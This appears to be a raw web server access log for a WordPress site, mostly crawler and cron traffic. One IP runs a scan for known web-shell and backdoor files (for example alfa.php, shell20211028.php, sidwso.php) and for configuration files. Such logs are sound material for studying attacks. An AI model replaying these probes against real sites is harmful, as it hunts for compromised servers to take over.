13.79.243.123 - - [13/Jul/2025:08:16:08 -0400] "GET /widgets.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:16:09 -0400] "GET /206xxskm37135.html HTTP/1.1" 404 23127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.79.243.123 - - [13/Jul/2025:08:16:14 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 302 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:16:12 -0400] "GET /items/bmeky191/12191?key=manage HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
66.29.146.47 - - [13/Jul/2025:08:16:20 -0400] "POST /wp-cron.php?doing_wp_cron=1752408980.3597490787506103515625 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
13.79.243.123 - - [13/Jul/2025:08:16:19 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fdangroup.sa%2Fwp-admin%2Fuser%2Fabout.php&reauth=1 HTTP/1.1" 200 3110 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:20 -0400] "GET /index/function.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:16:21 -0400] "GET /items/tenmp292/44196?key=encourage HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:16:32 -0400] "GET /wp-admin/maint/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:33 -0400] "GET /wp-admin/maint/ HTTP/1.1" 200 621 "-" "-"
66.249.79.136 - - [13/Jul/2025:08:16:41 -0400] "GET /63aoiy28576.html HTTP/1.1" 200 87310 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
136.243.228.194 - - [13/Jul/2025:08:16:34 -0400] "GET /items/wrwcy75/32767?key=regain HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:16:34 -0400] "GET /wp-includes/rest-api/fields/radio.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:46 -0400] "GET /wp-includes/fonts/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:48 -0400] "GET /wp-includes/fonts/ HTTP/1.1" 200 1154 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:48 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:51 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fdangroup.sa%2Fwp-admin%2Fnetwork%2Findex.php&reauth=1 HTTP/1.1" 200 3107 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:16:45 -0400] "GET /items/fkygs246/27188?key=mess HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:16:55 -0400] "GET /.well-known/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:56 -0400] "GET /.well-known/ HTTP/1.1" 200 614 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:56 -0400] "GET /alfa.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:16:57 -0400] "GET /196udajm619.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:17:02 -0400] "GET /lock.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:17:04 -0400] "GET /items/wyrxa90/49318?key=transportation HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:17:07 -0400] "GET /admin/function.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:17:08 -0400] "GET /113dcdup27820.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
136.243.228.194 - - [13/Jul/2025:08:17:12 -0400] "GET /162lzae36149.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:17:16 -0400] "GET /wp-admin/block-support.php HTTP/1.1" 404 23128 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:17:29 -0400] "POST /wp-cron.php?doing_wp_cron=1752409049.5500519275665283203125 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
66.29.146.47 - - [13/Jul/2025:08:17:29 -0400] "POST /wp-cron.php?doing_wp_cron=1752409049.6764910221099853515625 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
136.243.228.194 - - [13/Jul/2025:08:17:28 -0400] "GET /items/clrqw148/32370?key=fade HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:17:28 -0400] "GET /wp-includes/block-support.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:17:40 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:17:40 -0400] "GET /items/qyjab92/65224?key=distance HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:17:52 -0400] "GET /sx.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:17:54 -0400] "GET /items/qywsh253/25751?key=regard HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:17:56 -0400] "GET /function.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:00 -0400] "GET /236mqrj4909.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:02 -0400] "GET /wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:06 -0400] "GET /182wbf2627.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:07 -0400] "GET /.well-known/cong.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:18:11 -0400] "GET /158rglkc20043.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.79.243.123 - - [13/Jul/2025:08:18:13 -0400] "GET /wp-admin/css/colors/blue/about.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:14 -0400] "GET /items/czwau110/26076?key=considerably HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:20 -0400] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:22 -0400] "GET /items/hhcvl293/3813?key=functional HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:25 -0400] "GET /options.php HTTP/1.1" 404 23126 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:18:30 -0400] "POST /wp-cron.php?doing_wp_cron=1752409110.7663209438323974609375 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
136.243.228.194 - - [13/Jul/2025:08:18:29 -0400] "GET /items/xuusu289/28481?key=sustain HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:31 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:18:36 -0400] "GET /config.php HTTP/1.1" 404 23128 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:18:40 -0400] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:18:42 -0400] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 200 722 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:38 -0400] "GET /296ipmxu27113.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:42 -0400] "GET /buy.php HTTP/1.1" 404 23128 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:18:47 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 403 1242 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:44 -0400] "GET /40heqed32267.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:48 -0400] "GET /wp-content/themes/wp-pridmag/init.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:52 -0400] "GET /items/luugr160/18292?key=father HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:18:53 -0400] "GET /lv.php HTTP/1.1" 404 23128 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:18:58 -0400] "GET /network.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:19:04 -0400] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:18:59 -0400] "GET /258pui18095.html HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:05 -0400] "GET /.well-known/acme-challenge/ HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:19:10 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:19:06 -0400] "GET /items/fxijq22/35572?key=none HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:10 -0400] "GET /info.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:19:13 -0400] "GET /227zrwgm32748.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
136.243.228.194 - - [13/Jul/2025:08:19:15 -0400] "GET /items/fazhr111/31355?key=relevant HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:19 -0400] "GET /wp-includes/admin.php HTTP/1.1" 404 23128 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:19:25 -0400] "GET /wp-content/index.php HTTP/1.1" 200 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:19:23 -0400] "GET /90qzlea2277.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:26 -0400] "GET /user.php HTTP/1.1" 404 23126 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:19:31 -0400] "POST /wp-cron.php?doing_wp_cron=1752409171.7319309711456298828125 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
136.243.228.194 - - [13/Jul/2025:08:19:30 -0400] "GET /items/hauec248/34504?key=each HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:31 -0400] "GET /cong.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:19:38 -0400] "GET /link.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:19:38 -0400] "GET /items/frmpr213/12007?key=apart HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:44 -0400] "GET /wp-includes/autoload_classmap.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:19:46 -0400] "GET /items/hacvp284/23630?key=away HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:48 -0400] "GET /wp-admin/radio.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:19:53 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 200 1093 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:19:53 -0400] "GET /items/bxhvc175/21529?key=resume HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:19:53 -0400] "GET /doc.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:19:59 -0400] "GET /public/admin.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:20:01 -0400] "GET /items/gwqbm238/37352?key=colorful HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:05 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:20:09 -0400] "GET /items/uejgu112/3402?key=so HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:12 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:20:18 -0400] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:20:19 -0400] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 200 709 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:20:16 -0400] "GET /items/tbrld296/13394?key=discovery HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:19 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:20:21 -0400] "GET /248flwrr26415.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
136.243.228.194 - - [13/Jul/2025:08:20:24 -0400] "GET /items/hazvc182/45598?key=pleased HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:27 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 404 23126 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:20:34 -0400] "POST /wp-cron.php?doing_wp_cron=1752409234.0745170116424560546875 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
66.29.146.47 - - [13/Jul/2025:08:20:35 -0400] "POST /wp-cron.php?doing_wp_cron=1752409234.5841250419616699218750 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
136.243.228.194 - - [13/Jul/2025:08:20:33 -0400] "GET /items/envpa274/2864?key=arrow HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:33 -0400] "GET /atomlib.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:20:40 -0400] "GET /wp-admin/maint/ HTTP/1.1" 200 621 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:20:40 -0400] "GET /wp-content/radio.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:20:41 -0400] "GET /items/akciq297/9917?key=slide HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:46 -0400] "GET /wp-content/themes/admin.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:20:50 -0400] "GET /wp-content/themes/alera/alpha.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:20:50 -0400] "GET /233bza49468.html HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:20:56 -0400] "GET /mar.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:20:58 -0400] "GET /199ruoyk42210.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:00 -0400] "GET /gecko.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:21:05 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:21:06 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 200 1320 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:21:06 -0400] "GET /items/lwsfv265/12929?key=strict HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:07 -0400] "GET /mah.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:21:12 -0400] "GET /sidwso.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:21:13 -0400] "GET /items/kotkx127/41565?key=consult HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:17 -0400] "GET /wp-admin/user/index.php HTTP/1.1" 302 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:21:19 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fdangroup.sa%2Fwp-admin%2Fuser%2Findex.php&reauth=1 HTTP/1.1" 200 3106 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:21:20 -0400] "GET /165tca14224.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:20 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:21:20 -0400] "GET /135fivqi16674.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.79.243.123 - - [13/Jul/2025:08:21:28 -0400] "GET /files/index.php HTTP/1.1" 301 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:21:30 -0400] "GET /items/zdnrt60/1114?key=supermarket HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:29 -0400] "GET /files/ HTTP/1.1" 404 23126 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:21:36 -0400] "POST /wp-cron.php?doing_wp_cron=1752409296.5604600906372070312500 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
13.79.243.123 - - [13/Jul/2025:08:21:35 -0400] "GET /wp-admin/classwithtostring.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:21:36 -0400] "GET /items/nflmz185/18775?key=compelling HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:41 -0400] "GET /shell20211028.php HTTP/1.1" 404 23128 "-" "-"
47.82.60.44 - - [13/Jul/2025:08:21:45 -0400] "GET /pcmypage?callback=product/review/dirtfreak-g4930 HTTP/1.1" 301 0 "https://www.dangroup.sa/pcmypage?callback=product/review/dirtfreak-g4930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
136.243.228.194 - - [13/Jul/2025:08:21:42 -0400] "GET /items/iskdx146/6850?key=gesture HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:46 -0400] "GET /wp-includes/bak.php HTTP/1.1" 404 23126 "-" "-"
47.82.60.44 - - [13/Jul/2025:08:21:47 -0400] "GET /pcmypage?callback=product/review/dirtfreak-g4930 HTTP/1.1" 404 23126 "https://www.dangroup.sa/pcmypage?callback=product/review/dirtfreak-g4930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
136.243.228.194 - - [13/Jul/2025:08:21:49 -0400] "GET /items/whffd112/44344?key=Internet HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:21:53 -0400] "GET /wp-admin/wp-signup.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:21:58 -0400] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 404 23128 "-" "-"
47.82.60.34 - - [13/Jul/2025:08:21:58 -0400] "GET /items/hrtuz104/31548?key=rod HTTP/1.1" 404 23128 "https://dangroup.sa/items/hrtuz104/31548?key=rod" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
136.243.228.194 - - [13/Jul/2025:08:21:59 -0400] "GET /items/kodnl152/12234?key=stuff HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
47.82.60.46 - - [13/Jul/2025:08:22:01 -0400] "GET /25vnz426.html HTTP/1.1" 404 23126 "https://dangroup.sa/25vnz426.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:22:07 -0400] "GET /wp-configs.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:22:14 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 1251 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:22:10 -0400] "GET /items/prpfe189/24213?key=inventory HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:22:15 -0400] "GET /wp-admin/css/wp-login.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:22:18 -0400] "GET /7xrb26792.html HTTP/1.1" 404 23305 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:22:20 -0400] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:22:27 -0400] "GET /cgi-bin/index.php HTTP/1.1" 404 1251 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:22:24 -0400] "GET /160wxnnd25989.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
136.243.228.194 - - [13/Jul/2025:08:22:25 -0400] "GET /items/lgkke104/26076?key=openly HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:22:27 -0400] "GET /wp-content/admin.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:22:34 -0400] "GET /wp-file.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:22:35 -0400] "GET /260yamf9941.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
66.29.146.47 - - [13/Jul/2025:08:22:43 -0400] "POST /wp-cron.php?doing_wp_cron=1752409363.1514339447021484375000 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
13.79.243.123 - - [13/Jul/2025:08:22:42 -0400] "GET /readme.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:22:43 -0400] "GET /items/mjhfl117/5923?key=banana HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:22:49 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:22:51 -0400] "GET /items/uqltc77/14759?key=conventional HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:22:55 -0400] "GET /1.php HTTP/1.1" 404 23305 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:23:00 -0400] "GET /items/spegp117/34785?key=five HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:23:02 -0400] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:08 -0400] "GET /system_log.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:12 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:13 -0400] "GET /wp-includes/SimplePie/ HTTP/1.1" 200 689 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:13 -0400] "GET /web.php HTTP/1.1" 404 23126 "-" "-"
40.81.226.87 - - [13/Jul/2025:08:23:16 -0400] "GET /style.php HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.79.243.123 - - [13/Jul/2025:08:23:17 -0400] "GET /a.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:23 -0400] "GET /wp-content/plugins/pwnd/dropdown.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:27 -0400] "GET /wp-content/plugins/envato-market/inc/class-envato-market-github.php HTTP/1.1" 404 23126 "-" "-"
